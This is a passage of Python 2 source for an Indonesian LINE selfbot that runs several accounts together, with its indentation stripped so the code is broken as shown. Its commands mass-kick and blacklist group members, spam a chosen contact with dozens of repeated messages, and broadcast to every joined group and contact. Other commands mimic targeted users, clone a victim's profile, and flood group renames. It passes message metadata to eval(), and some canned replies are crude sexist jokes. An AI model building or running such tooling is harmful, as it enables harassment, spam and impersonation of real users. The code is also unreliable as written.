nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
satpam.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
satpam.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
satpam.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#----------------Fungsi Kick User Target Finish----------------------#
elif "Blacklist @ " in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = random.choice(KAC).getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Succes Plak")
except:
random.choice(KAC).sendText(msg.to,"error")
#----------------Fungsi Banned User Target Start-----------------------#
elif "Banned @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
ki.sendText(msg.to,"Dilarang Banned Bot")
kk.sendText(msg.to,"Dilarang Banned Bot")
kc.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Akun telah sukses di banned")
except:
random.choice(KAC).sendText(msg.to,"Error")
#----------------Fungsi Banned User Target Finish-----------------------#
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
kc.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-------------Fungsi Spam Start---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
#-------------Fungsi Spam Finish---------------------#
#----------------------------[Spam To Contact]----------------------------#WORK
elif "Spamcontact @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Masuk Room Woy")
cl.sendText(g.mid,"Masuk Room Woy")
cl.sendText(g.mid,"Masuk Room Woy")
cl.sendText(g.mid,"Masuk Room Woy")
cl.sendText(g.mid,"Masuk Room Woy")
cl.sendText(g.mid,"Masuk Room Woy")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Masuk Room Woyp")
kk.sendText(g.mid,"Masuk Room Woy")
kk.sendText(g.mid,"Masuk Room Woy")
kk.sendText(g.mid,"Masuk Room Woy")
kk.sendText(g.mid,"Masuk Room Woy")
cl.sendText(msg.to, "Target Spam, Done...!!!")
kk.sendText(msg.to, "Target Spam, Done...!!!")
print " Spammed !"
#----------------------------[Spam To Contact]----------------------------#WORK
#--------------------Start-----------------------#
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Bisa Jadi","Jangan berharap")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Berapa besar cinta " in msg.text:
tanya = msg.text.replace("Berapa besar cinta ","")
jawab = ("0%","25%","50%","75%","100%")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Siapakah cewek " in msg.text:
tanya = msg.text.replace("Siapakah cewek ","")
jawab = ("Maryati�","Ida�","Uke�","Alyn�","Ikka�","Yunikey�","Qwenie�","Gendis�","Aryani�","Nindy�","Wina�","Dewi�","Ifah�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Siapakah cowok " in msg.text:
tanya = msg.text.replace("Siapakah cowok ","")
jawab = ("Arjun�","Ahmad khan�","Hajir�","Dd�","Indra�","Jeong�","Yogi�","Ary�","Ucil�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Adakah " in msg.text:
tanya = msg.text.replace("Adakah ","")
jawab = ("Tidak tahu.","Ada.","Tidak ada.","Mungkin ada")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Cakepkah " in msg.text:
tanya = msg.text.replace("Cakepkah ","")
jawab = ("Jelek.","Cakep.","Lumayan.","Kaya jembut.")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
#-------------------Finish-----------------------#
#-------------Fungsi Broadcast Start------------#
elif "GBc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in owner:
bctxt = msg.text.replace("GBc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
a = ks.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
ks.sendText(taf, (bctxt))
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
#------------ Keluar Dari Semua Group------
elif msg.text in ["Bot kadieu"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
gid = ks.getGroupIdsJoined()
for i in gid:
ks.leaveGroup(i)
kc.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
cl.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sayonara, Bye bye all...!!!")
else:
cl.sendText(msg.to,"He declined all invitations")
#------------------------End---------------------
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#-----------------End-----------
elif msg.text in ["hai","Hai"]:
ki.sendText(msg.to,"Hai Every Body Har Har")
kk.sendText(msg.to,"Hai Every Body Har Har")
kc.sendText(msg.to,"Hai Every Body Har Har")
#-----------------------------------------------)
elif msg.text in ["Wc","wc","kam"]:
ki.sendText(msg.to,"Selamat datang di Group Kami")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
elif msg.text in ["PING","Ping","ping"]:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
kk.sendText(msg.to,"PONG double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
#-----------------------------------------------
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["Absen","Respon"]:
if msg.from_ in admin:
kk.sendText(msg.to,"★★★")
ki.sendText(msg.to,"★★★★")
cl.sendText(msg.to,"★★★★★")
kc.sendText(msg.to,"★★★★★★")
ks.sendText(msg.to,"★★★★★★★")
random.choice(KAC).sendText(msg.to,"Semua Hadir Boss\nSiap Protect Group\nAman Gak Aman Yang Penting Anu\n[✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰]")
#-------------Fungsi Respon Finish---------------------#
#==========================================
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki.sendText(msg.to,text)
kc.sendText(msg.to,text)
kk.sendText(msg.to,text)
ks.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
k1.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
# elif msg.text in ["Target list"]:
# if msg.from_ in admin:
# if mimic["target"] == {}:
# cl.sendText(msg.to,"nothing")
# else:
# mc = "Target mimic user\n"
# for mi_d in mimic["target"]:
# mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
# cl.sendText(msg.to,mc)
# elif "Mimic:" in msg.text:
# if msg.from_ in admin:
# cmd = msg.text.replace("Mimic:","")
# if cmd == "on":
# if mimic["status"] == False:
# mimic["status"] = True
# cl.sendText(msg.to,"turning on mimic")
#
# else:
# cl.sendText(msg.to,"mimic have been enable")
# elif cmd == "off":
# if mimic["status"] == True:
# mimic["status"] = False
# cl.sendText(msg.to,"turning off mimic")
#
# else:
# cl.sendText(msg.to,"Mimic have been desable")
# elif "Mimic target " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Mimic target ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
#
# else:
# for target in targets:
# try:
# mimic["target"][target] = True
# cl.sendText(msg.to,"Success added target")
#
# #cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed")
#
# break
# elif "Untarget " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Untarget ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# gInfo = ki.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
# else:
# for target in targets:
# try:
# del mimic["target"][target]
# cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed!")
#==========================================
elif msg.text in ["Mimic on","mimic on","Mimic:on"]:
if msg.from_ in admin:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic off","Mimic:off"]:
if msg.from_ in admin:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list","Targetlist"]:
if msg.from_ in admin:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if msg.from_ in admin:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#==========================================
#----------------------------------------------
elif "copy @" in msg.text:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
#-----------------------------------------------
elif msg.text in ["Backup","backup"]:
if msg.from_ in owner:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
elif "rejectall" in msg.text:
X = cl.getGroupIdsInvited()
for i in X:
cl.rejectGroupInvitation(i)
#--------------------------------------------------------
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah questioning")
#-------------Fungsi Balesan Respon Finish---------------------#
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "Sabar Boss...")
elapsed_time = time.time() - start
ki.sendText(msg.to, "%sDetik" % (elapsed_time))
kk.sendText(msg.to, "%sDetik" % (elapsed_time))
cl.sendText(msg.to, "%sDetik" % (elapsed_time))
kc.sendText(msg.to, "%sDetik" % (elapsed_time))
#-------------Fungsi Speedbot Finish---------------------#
#--------------------------------------------------------
elif msg.text in ["Remove all chat"]:
if msg.from_ in admin:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat")
#---------------------Sc invite owner ke group------
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in owner:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
ki.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
elif msg.text in ["Unban"]:
if msg.from_ in owner:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
ki.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
#-------------Fungsi Banned Send Contact Finish------------------#
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u31ef22df7f538df1d74dc7f756ef1a32'}
cl.sendText(msg.to,"======================")
cl.sendMessage(msg)
cl.sendText(msg.to,"======================")
cl.sendText(msg.to,"Itu Creator Kami Yang Manis Kalem 😜\nSmule : @FS3i_Kris_S1H\nNama : Kris\nZodiak : Cancer")
#-------------Fungsi Chat ----------------
elif msg.text in ["Woy","woy","Woi","woi"]:
quote = ['Istri yang baik itu Istri yang Mengizinkan Suaminya untuk Poligami 😂😂😂.','Kunci Untuk Bikin Suami Bahagia itu cuma satu..\nIzinkan Suamimu Untuk Selingkuh Coyyy ','Ah Koplak Lu','Muka Lu Kaya Jembut','Ada Orang kah disini?','Ada Janda Yang Bisa Di Ajak Mojok Gak, Euy','Ada Perawan Nganggur ga Coy?']
psn = random.choice(quote)
cl.sendText(msg.to,psn)
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
random.choice(KAC).sendText(msg.to,"Tidak Ada Akun Terbanned")
else:
random.choice(KAC).sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
random.choice(KAC).sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "albumat'" in msg.text:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecat'" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecat'","")
random.choice(KAC).sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
if op.type == 32:
OWN = ""
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
#---------CCTV-----------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n[•]" + Name
wait2['ROM'][op.param1][op.param2] = "[•]" + Name
else:
cl.sendText
except:
pass
#---------------------
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "Welcome\nSelamat Datang Di " + str(ginfo.name))
random.choice(KAC).sendText(op.param1, "Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
random.choice(KAC).sendText(op.param1, "Budayakan Baca Note !!! yah Ka 😊\nSemoga Betah Kk 😘\nNo Baper,No nakal,No Ngeyel ya,No Boong")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "Baper Tuh Orang :v\nBelum di Anu Kayanya 😊")
print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
#Restart_Program
elif msg.text in ["Bot restart"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
